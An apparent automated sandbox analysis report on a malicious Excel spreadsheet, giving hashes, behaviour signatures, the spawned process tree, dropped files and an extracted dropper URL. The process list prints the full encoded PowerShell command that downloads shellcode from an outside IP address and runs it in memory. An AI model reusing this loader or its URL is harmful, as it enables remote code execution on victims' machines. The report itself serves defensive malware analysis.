Analysis

  • max time kernel
    16s
  • max time network
    22s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 21:45

General

  • Target

    35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727.xls

  • Size

    46KB

  • MD5

    4360b82910d2577e2fbb3f10e423395c

  • SHA1

    9d3d039e74400e7ea02bf359af9ba31fe36cec8e

  • SHA256

    35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727

  • SHA512

    7c971060c5a40a961ea6c742f17afc879d82ca828f1beb886aeb8e1dddcf6a3a9e12a799b26e99c42b65f2d3808b781b6eb4d101315cee2cb807ecc68b9a3de9

  • SSDEEP

    768:3X4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9UF:YSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\icp8hnk9.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2616
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60F6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC60F5.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2224

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES60F6.tmp

    Filesize

    1KB

    MD5

    afd30f94fe7322c1ee9ab693e6bd5f90

    SHA1

    2d344aa75a3c94f8a337258afb48c9128e05709a

    SHA256

    32ee54786573e27f4455ddb560bda3f1850f0638f3e4ebc2f85b8c8f8038c5df

    SHA512

    516bd9f4a1c8bda300c96c860c880724c52d58655284d8c4db41309465109479e1a8fff036bd450dfe09f017c8ebf71b0bc0000ea72190a83c107556786c9d9c

  • C:\Users\Admin\AppData\Local\Temp\icp8hnk9.dll

    Filesize

    3KB

    MD5

    c5cae500aff3c1efbd06f98b3cc3be2c

    SHA1

    9e79d883158041da14744e8ae3e314181b8be2c3

    SHA256

    e5359f4788facd29ce0200289cf41a752c3b687ea0cc76bd292f1a4ef692ffea

    SHA512

    e792c1ef3d07addfee8fff9fb1c948c3843d1eec09aeb1db21b3f563a3914b2be9b86c1ebbbd951a56ffdc9c35eef048c12db6bb4c12578de1ef3871401e760d

  • C:\Users\Admin\AppData\Local\Temp\icp8hnk9.pdb

    Filesize

    7KB

    MD5

    9d938266241415f64c0d48ae76769b44

    SHA1

    bf2a679c82f1633eaa0687667e0b84176be78a29

    SHA256

    8faac177fc18da9e311aee0d6226115c771e331453258342b6da4f6f59db9d17

    SHA512

    2f084d6cb2ea95788ef41255b5aa12f6a27d528b91113b580a744dc823b8fa95369369542e243ad7285215087cad7e95e1cce2e90c041d6164e5d0dd927ac3de

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC60F5.tmp

    Filesize

    652B

    MD5

    d6c8c84953a51afac1c98ebfb1fecd5b

    SHA1

    8b7f7de6930a6a233ac6c144c23769266cc77603

    SHA256

    dc372fd64a45da98e7ed8d53d15c11347d4f7a2d02ae42a69dac70113006f6b5

    SHA512

    2bfdbabe31ee2646cf5410fca8f29cd56a42b9c7c85b2980339506e88a6051295c2398ab25fafa491a853573a9348671ff09c15da67bf5457360e628be9bd284

  • \??\c:\Users\Admin\AppData\Local\Temp\icp8hnk9.0.cs

    Filesize

    631B

    MD5

    f4dd5c682eb7b3b679f084261bfc7c4c

    SHA1

    70f75d7a4e42c185eb09139ed3c6f7338a2219c2

    SHA256

    2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

    SHA512

    8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

  • \??\c:\Users\Admin\AppData\Local\Temp\icp8hnk9.cmdline

    Filesize

    309B

    MD5

    11ed3c3201d0413eadea8ba25683e84d

    SHA1

    099469b92523c83370eef0ccf5577810fbc94f09

    SHA256

    67174016f4939bfe4fce470047a74209398dd0f0aa088eae36ba162a98c085a7

    SHA512

    251d52d446645eaceb34812b44bc92c33c4f21f1db4b77454e876c63fa7aab6ec9feba69ca44e92faf6938ffc262faa1ed023033eedd4337f787857d5972895e

  • memory/2180-6-0x0000000000850000-0x0000000000950000-memory.dmp

    Filesize

    1024KB

  • memory/2180-2-0x0000000000850000-0x0000000000950000-memory.dmp

    Filesize

    1024KB

  • memory/2180-9-0x0000000000850000-0x0000000000950000-memory.dmp

    Filesize

    1024KB

  • memory/2180-8-0x0000000000850000-0x0000000000950000-memory.dmp

    Filesize

    1024KB

  • memory/2180-4-0x0000000000850000-0x0000000000950000-memory.dmp

    Filesize

    1024KB

  • memory/2180-5-0x0000000000850000-0x0000000000950000-memory.dmp

    Filesize

    1024KB

  • memory/2180-1-0x000000007283D000-0x0000000072848000-memory.dmp

    Filesize

    44KB

  • memory/2180-7-0x0000000000850000-0x0000000000950000-memory.dmp

    Filesize

    1024KB

  • memory/2180-3-0x0000000000850000-0x0000000000950000-memory.dmp

    Filesize

    1024KB

  • memory/2180-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2180-27-0x000000007283D000-0x0000000072848000-memory.dmp

    Filesize

    44KB

  • memory/2180-28-0x0000000000850000-0x0000000000950000-memory.dmp

    Filesize

    1024KB